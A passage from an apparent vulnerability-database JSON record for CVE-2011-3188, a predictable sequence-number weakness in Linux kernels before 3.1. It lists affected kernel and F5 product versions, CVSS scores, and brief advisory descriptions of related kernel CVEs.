        "vendor": "linux",
        "version": "2.6.27.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.29.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.32.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.33.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.34.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.35.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.35.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.35.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "3.0.24"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:enterprise_manager:3.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:firepass:7.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_protocol_security_module:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.2.4",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:firepass:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.1.0",
                "versionStartIncluding": "6.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:arx:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.4.0",
                "versionStartIncluding": "6.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:enterprise_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.3.0",
                "versionStartIncluding": "2.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_protocol_security_module:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.1.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dan Kaminsky",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2011-3188",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.4,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.4,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-51133",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2011-3188",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 5.2,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-3188",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201108-429",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-51133",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2011-3188",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The (1) IPv4 and (2) IPv6 implementations in the Linux kernel before 3.1 use a modified MD4 algorithm to generate sequence numbers and Fragment Identification values, which makes it easier for remote attackers to cause a denial of service (disrupted networking) or hijack network sessions by predicting these values and sending crafted packets. The NFSv4 implementation is one of the distributed file system protocols.  The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2009-4067\n\n    Rafael Dominguez Vega of MWR InfoSecurity reported an issue in the auerswald\n    module, a driver for Auerswald PBX/System Telephone USB devices.  Attackers\n    with physical access to a system\u0027s USB ports could obtain elevated\n    privileges using a specially crafted USB device. \n\nCVE-2011-0712\n\n    Rafael Dominguez Vega of MWR InfoSecurity reported an issue in the caiaq\n    module, a USB driver for Native Instruments USB audio devices. Attackers\n    with physical access to a system\u0027s USB ports could obtain elevated\n    privileges using a specially crafted USB device. \n\nCVE-2011-1020\n\n    Kees Cook discovered an issue in the /proc filesystem that allows local\n    users to gain access to sensitive process information after execution of a\n    setuid binary. \n\nCVE-2011-2209\n\n    Dan Rosenberg discovered an issue in the osf_sysinfo() system call on the\n    alpha architecture. Local users could obtain access to sensitive kernel\n    memory. \n    \nCVE-2011-2211\n\n    Dan Rosenberg discovered an issue in the osf_wait4() system call on the\n    alpha architecture permitting local users to gain elevated privileges. \n\nCVE-2011-2213\n\n    Dan Rosenberg discovered an issue in the INET socket monitoring interface. \n\nCVE-2011-2484\n\n    Vasiliy Kulikov of Openwall discovered that the number of exit handlers that\n    a process can register is not capped, resulting in local denial of service\n    through resource exhaustion (cpu time and memory). \n\nCVE-2011-2491\n\n    Vasily Averin discovered an issue with the NFS locking implementation.  A\n    malicious NFS server can cause a client to hang indefinitely in an unlock\n    call. \n\nCVE-2011-2492\n\n    Marek Kroemeke and Filip Palian discovered that 